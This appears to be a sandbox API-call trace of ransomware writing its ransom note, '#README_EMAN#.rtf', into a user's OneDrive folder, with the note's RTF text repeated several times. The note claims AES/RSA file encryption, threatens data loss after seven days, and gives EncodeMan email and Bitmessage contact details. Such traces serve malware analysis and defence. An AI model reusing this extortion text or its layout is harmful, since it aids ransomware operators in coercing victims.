wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³:Ý\x11\x97b\x1c\x19dÁÎ\x1dتxU¼É¯\x84\x82\x186Ó\x19", lpUsedDefaultChar=0x0) returned 8717 [0301.696] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0301.696] CloseHandle (hObject=0x27c) returned 1 [0301.696] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bg\\#readme_eman#.rtf")) returned 0xffffffff [0301.696] GetLastError () returned 0x2 [0301.696] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bg\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0301.697] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.697] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.697] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 